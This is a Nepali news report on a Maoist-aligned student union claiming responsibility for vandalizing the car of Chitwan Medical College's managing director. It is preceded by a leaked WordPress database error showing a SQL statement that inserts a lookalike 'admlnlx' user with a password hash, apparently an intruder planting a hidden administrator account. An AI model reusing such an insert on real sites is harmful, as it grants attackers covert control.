WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BF5XhckkCtnrU..Vg2Q8rjiHDPl5I8.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:38:32', '', 'admlnlx', 'admlnlx')
चितवन, माघ १२–
चितवन मेडिकल कलेजका प्रवन्ध निर्देशक डा.हरिषचन्द्र न्यौपानेको गाडी तोडफोडको जिम्मेवारी विप्लव माओवादी निकट अखिल नेपाल राष्ट्रिय स्वतन्त्र विद्यार्थी युनियन (क्रान्तिकारी)ले लिएको छ ।
मेडिकल विभाग केन्द्रीय समितिको नाममा जारी विज्ञप्तीमा तीन कारण जनाउँदै चितवन मेडिकल कलेजलाई कारवाही गरिएको उल्लेख छ । जसमा संगठनले गरेको संघर्ष प्रति लापरवाही गरेको, संगठनसंग भएको सहमती कार्यान्वयन नभएको र मजदुरमाथि चरम दमन भएको उल्लेख छ ।
मंगलबार अपरान्ह मेडिकल कलेज परिसरमा प्रवन्ध निर्देशक डा.हरिष सवार बा १४ च ७५६४ नम्बरको गाडीमा क्रिकेटको स्ट्याम्पले हानेर तोडफोड गरिएको थियो । प्रहरीले तोडफोड गर्नेको खोजी कार्य जारी राखेपनि कसैलाई पक्राउ गर्न सकेको छैन् ।
शैक्षिक सुधारको माग राख्दै अखिल क्रान्तिकारीले मंसिर २९ गते देशभर मेडिकल कलेजमा गरेको तालाबन्दीमा चितवन मेडिकल कलेजमा ताला फोडेको प्रति गम्भिर ध्यानाकर्षण समेत जनाएको छ ।